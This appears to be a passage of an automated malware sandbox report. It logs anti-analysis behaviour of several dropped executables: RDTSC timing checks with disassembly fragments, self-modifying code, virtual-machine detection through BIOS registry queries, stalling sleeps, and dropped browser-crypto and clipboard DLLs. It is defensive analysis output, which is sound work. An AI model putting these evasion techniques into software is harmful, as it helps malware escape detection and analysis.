Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 7820A2 second address: 7820A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 78307B second address: 7830CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a movsx ebx, dx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F8FA106A478h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 sub dword ptr [ebp+12457EF7h], edi 0x0000002f push 00000000h 0x00000031 jo 00007F8FA106A47Ah 0x00000037 mov bx, 6D60h 0x0000003b push eax 0x0000003c push ebx 0x0000003d pushad 0x0000003e jmp 00007F8FA106A47Bh 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 783FE5 second address: 784066 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F8FA0CCCDDCh 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F8FA0CCCDD8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b pushad 0x0000002c mov dword ptr [ebp+1244BF09h], ecx 0x00000032 mov cl, A1h 0x00000034 popad 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F8FA0CCCDD8h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 00000015h 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 mov dword ptr [ebp+1244A9DBh], ecx 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 push ecx 0x0000005a pushad 0x0000005b popad 0x0000005c pop ecx 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 784066 second address: 784096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FA106A480h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8FA106A487h 0x00000013 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 785FD4 second address: 785FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 785FDA second address: 785FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8FA106A481h 0x0000000f rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 785FF5 second address: 785FF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 789BE4 second address: 789BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 78AB87 second address: 78AB8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 78AB8E second address: 78ABFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F8FA106A478h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov bx, cx 0x00000027 sub dword ptr [ebp+122D3131h], ebx 0x0000002d mov di, 00A6h 0x00000031 push 00000000h 0x00000033 jmp 00007F8FA106A488h 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D271Bh], ecx 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 ja 00007F8FA106A478h 0x00000048 push eax 0x00000049 pop eax 0x0000004a push ebx 0x0000004b pushad 0x0000004c popad 0x0000004d pop ebx 0x0000004e popad 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push ebx 0x00000053 push ecx 0x00000054 pop ecx 0x00000055 pop ebx 0x00000056 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 78BCC2 second address: 78BD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FA0CCCDDEh 0x00000009 popad 0x0000000a pop edx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F8FA0CCCDD8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D1D66h], edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F8FA0CCCDD8h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 0000001Ah 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D2756h], ecx 0x0000004e push 00000000h 0x00000050 jmp 00007F8FA0CCCDDAh 0x00000055 xchg eax, esi 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 push ebx 0x0000005a pop ebx 0x0000005b rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 78BD3C second address: 78BD4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F8FA106A47Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 78E341 second address: 78E346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 78E346 second address: 78E359 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8FA106A478h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 78E359 second address: 78E35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 78E35D second address: 78E363 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 7914E1 second address: 7914E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 7914E6 second address: 791566 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8FA106A478h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b xor edi, 3F28A66Eh 0x00000011 push 00000000h 0x00000013 or edi, 38E01503h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F8FA106A478h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 mov ebx, dword ptr [ebp+122D2CA2h] 0x0000003b jo 00007F8FA106A47Ch 0x00000041 mov dword ptr [ebp+122D23DDh], esi 0x00000047 xchg eax, esi 0x00000048 pushad 0x00000049 jmp 00007F8FA106A481h 0x0000004e js 00007F8FA106A47Ch 0x00000054 jne 00007F8FA106A476h 0x0000005a popad 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F8FA106A47Dh 0x00000065 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 791566 second address: 79157E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 792525 second address: 792583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F8FA106A478h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov ebx, dword ptr [ebp+12457EF7h] 0x00000027 push 00000000h 0x00000029 jmp 00007F8FA106A486h 0x0000002e push 00000000h 0x00000030 jmp 00007F8FA106A480h 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 792583 second address: 792587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 779D23 second address: 779D31 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8FA106A476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 77F0F0 second address: 77F102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8FA0CCCDD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 77F102 second address: 77F106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 77F106 second address: 77F10A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 77F10A second address: 77F110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 780172 second address: 780176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 781224 second address: 781228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 7831EB second address: 7831F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 7831F3 second address: 783204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F8FA106A476h 0x00000011 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 783204 second address: 78320E instructions: 0x00000000 rdtsc 0x00000002 je 00007F8FA0CCCDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 7851C3 second address: 7851C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 79AFF5 second address: 79AFFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 79AFFF second address: 79B003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 79B003 second address: 79B019 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F8FA0CCCDE0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 79B019 second address: 79B056 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F8FA106A47Ch 0x0000000c jnp 00007F8FA106A476h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jl 00007F8FA106A499h 0x0000001b jmp 00007F8FA106A487h 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 pop esi 0x00000024 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 79A870 second address: 79A87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8FA0CCCDD6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7EF81C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7EF8B6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 995170 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 995579 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9BFF8D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A1FE0C instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Special instruction interceptor: First address: 77CA06 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: CECA06 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: AFEBE5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: CB03D3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: CC190C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Special instruction interceptor: First address: 31F81C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Special instruction interceptor: First address: 31F8B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Special instruction interceptor: First address: 4C5170 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Special instruction interceptor: First address: 4C5579 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Special instruction interceptor: First address: 4EFF8D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Special instruction interceptor: First address: 54FE0C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Special instruction interceptor: First address: 795F08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Special instruction interceptor: First address: 80E99E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: 63D5F08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: 644E99E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: 619F81C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: 619F8B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: 6345170 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: 6345579 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: 636FF8D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: 63CFE0C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Special instruction interceptor: First address: B05F08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Special instruction interceptor: First address: B7E99E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: 64AF81C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: 64AF8B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: 6655170 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: 6655579 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: 667FF8D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Special instruction interceptor: First address: 66DFE0C instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Memory allocated: 4A10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Memory allocated: 4C20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Memory allocated: 4A60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Memory allocated: 4880000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Memory allocated: 4B00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Memory allocated: 4A00000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\DocumentsDHCAECGIEB.exe

Code function: 21_2_054A0B84 rdtsc

21_2_054A0B84

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1696
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 6824
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 9997
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 9997
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 9994
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 9995
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 9995

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\clip[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1005203011\clip.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe TID: 1412	Thread sleep time: -38019s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4304	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2276	Thread sleep time: -32016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8304	Thread sleep count: 78 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8304	Thread sleep time: -156078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8348	Thread sleep count: 75 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8348	Thread sleep time: -150075s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8792	Thread sleep count: 329 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8792	Thread sleep time: -9870000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8312	Thread sleep count: 70 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8312	Thread sleep time: -140070s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8340	Thread sleep count: 61 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8340	Thread sleep time: -122061s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8292	Thread sleep count: 67 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8292	Thread sleep time: -134067s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8308	Thread sleep count: 1696 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8308	Thread sleep time: -3393696s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8436	Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8296	Thread sleep count: 71 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8296	Thread sleep time: -142071s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8308	Thread sleep count: 6824 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8308	Thread sleep time: -13654824s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8268	Thread sleep count: 9997 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8268	Thread sleep time: -9997000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8984	Thread sleep count: 9997 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8984	Thread sleep time: -9997000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe TID: 1412	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe TID: 8708	Thread sleep time: -38019s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5424	Thread sleep count: 9994 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5424	Thread sleep time: -9994000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1852	Thread sleep count: 9995 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1852	Thread sleep time: -9995000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe TID: 9088	Thread sleep time: -270000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe TID: 2428	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3144	Thread sleep count: 9995 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3144	Thread sleep time: -9995000s >= -30000s
